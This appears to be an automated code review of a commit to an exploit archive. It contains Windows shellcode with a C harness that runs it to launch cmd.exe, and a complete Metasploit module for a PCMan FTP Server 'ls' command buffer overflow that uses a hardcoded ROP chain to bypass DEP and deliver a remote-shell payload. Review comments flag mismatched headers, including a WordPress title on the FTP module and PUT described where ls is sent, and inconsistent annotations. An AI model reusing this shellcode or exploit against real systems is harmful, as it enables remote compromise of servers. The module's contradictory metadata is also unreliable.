4010bf: 88 4c 24 01 mov %cl,0x1(%esp)
4010c3: 68 63 75 74 65 push $0x65747563
4010c8: 68 6c 45 78 65 push $0x6578456c
4010cd: 68 53 68 65 6c push $0x6c656853
4010d2: 54 push %esp
4010d3: 50 push %eax
4010d4: ff d6 call *%esi
4010d6: 83 c4 0d add $0xd,%esp
4010d9: 31 c9 xor %ecx,%ecx
4010db: 68 65 78 65 41 push $0x41657865
4010e0: 88 4c 24 03 mov %cl,0x3(%esp)
4010e4: 68 63 6d 64 2e push $0x2e646d63
4010e9: 54 push %esp
4010ea: 59 pop %ecx
4010eb: 31 d2 xor %edx,%edx
4010ed: 42 inc %edx
4010ee: 52 push %edx
4010ef: 31 d2 xor %edx,%edx
4010f1: 52 push %edx
4010f2: 52 push %edx
4010f3: 51 push %ecx
4010f4: 52 push %edx
4010f5: 52 push %edx
4010f6: ff d0 call *%eax
4010f8: ff d7 call *%edi
*/
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7";
main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}
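Review bot: `main()` with no return type relies on implicit int, which C99 removed; declare `int main(void)` and return a value. In the assembly listing the stack clean-ups after the lookup calls do not match the bytes pushed: the `LoadLibraryA` name is `push ecx` plus three dwords (16 bytes) followed by `add esp,12`, `shell32.dll` is 16 bytes followed by `add esp,11`, and `ShellExecuteA` is 16 bytes followed by `add esp,13`, so ESP drifts by a few bytes per block. Nothing is popped afterwards so it happens not to matter, but the comments present these as balanced clean-ups; either fix the constants or say the drift is intentional. The `Tested on : Windows 7,10 x86` header should also record how the harness was built, since `char shellcode[]` sits in a writable data section and the cast-to-function call is exactly what DEP blocks in a default build.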

platforms/win64/remote/39999.rb (executable file, 140 lines)

@ -0,0 +1,140 @@
=begin
# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
# Date: 22-06-2016
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Exploit Author: quanyechavshuo
# Contact: quanyechavshuo@gmail.com
# Website: http://xinghuacai.github.io
# Category: ftp remote exploit
1. Description
this is another bug of pcmanftp which can be used to get a remote shell,and fits well with win7x64 with dep open,refer from
https://www.exploit-db.com/exploits/39662/
use anonymous and any password to login the ftp remotely,then send a command "ls AAA...A"(9000),the pcmanftp will crashed,later,find the 2009-2012th "A" will replace the pcmanftp's retn address
=end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'PCMAN FTP Server Buffer Overflow - ls Command',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in the PUT command of the
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
credientials are enabled.
},
'Author' =>
[
'quanyechavshuo'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '39662'],
[ 'OSVDB', 'N/A']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0A\x0D",
},
'Platform' => 'win',
'Targets' =>
[
[ 'windows 7 x64 chinese',
{
#'Ret' => 0x77636aeb, #dont need ret here in win7
'Offset' => 2008
}
],
],
'DisclosureDate' => 'Aug 07 2015',
'DefaultTarget' => 0))
end
def check
connect_login
disconnect
if /220 PCMan's FTP Server 2\.0/ === banner
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x77032c3b, # POP EAX # RETN [kernel32.dll]
0x41414141, # add a 4 bytes data to fit retn 0x4 from the last function's retn before eip=rop_gadgets
0x73c112d0, # ptr to &VirtualProtect() [IAT OLEACC.dll]
0x76bb4412, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSCTF.dll]
0x76408d2a, # XCHG EAX,ESI # RETN [SHLWAPI.dll]
0x76b607f0, # POP EBP # RETN [msvcrt.dll]
0x74916f14, # & push esp # ret [RICHED20.dll]
0x7368b031, # POP EAX # RETN [COMCTL32.dll]
0xfffffaff, # Value to negate, will become 0x00000201
0x756c9a5c, # NEG EAX # RETN [SHELL32.dll]
0x767088bd, # XCHG EAX,EBX # RETN [RPCRT4.dll]
0x77031d7b, # POP EAX # RETN [kernel32.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x76cc4402, # NEG EAX # RETN [SHELL32.dll]
0x76b4ad98, # XCHG EAX,EDX # RETN [SHELL32.dll]
0x756b1cc1, # POP ECX # RETN [SHELL32.dll]
0x7647c663, # &Writable location [USP10.dll]
0x73756cf3, # POP EDI # RETN [COMCTL32.dll]
0x76cc4404, # RETN (ROP NOP) [USER32.dll]
0x76b3f5d4, # POP EAX # RETN [msvcrt.dll]
0x90909090, # nop
0x7366e16f, # PUSHAD # RETN [COMCTL32.dll]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
connect_login
print_status('Generating payload...')
sploit = rand_text_alpha(target['Offset'])
#tmp = sploit
#print_status(tmp)
sploit << create_rop_chain()
#sploit << make_nops(9) 这句产生的nop并非90
sploit << "\x90"*30
#sploit << "\x41"*30
#sploit << "\xcc"
sploit << payload.encoded
#tmp=sploit
tmp=make_nops(9)
print_status(tmp)
send_cmd( ["ls", sploit], false )
disconnect
end
end
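Review bot: the header block contradicts the module: `Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload` and `Category: ftp remote exploit` sit above a PCMan FTP Server module whose `Software Link` points at PCMan.7z, and the `Description` says the overflow is in the PUT command while `exploit` sends `send_cmd( ["ls", sploit], false )`; fix the title and description to match the code. The file lives under `platforms/win64/remote` although the target is the 32-bit FTP server process and the ROP chain uses 32-bit gadgets; the `'windows 7 x64 chinese'` target should also record the exact OS build and DLL versions, because every address in `create_rop_chain` is hardcoded against them. In that chain, the adjacent gadgets `0x76cc4402` and `0x76cc4404` are annotated as SHELL32.dll and USER32.dll respectively, which cannot both be right; regenerate the annotations. Debug residue remains in `exploit` (`tmp=make_nops(9)` / `print_status(tmp)` and the commented-out `#tmp = sploit` lines) and the comment on the `#sploit << make_nops(9)` line is in Chinese (it says the NOPs that call produces are not 0x90); remove the residue and write the comment in English. `[ 'OSVDB', 'N/A']` is an empty reference and should be dropped, and the class should be `MetasploitModule` as in the other module in this commit rather than the legacy `Metasploit3`.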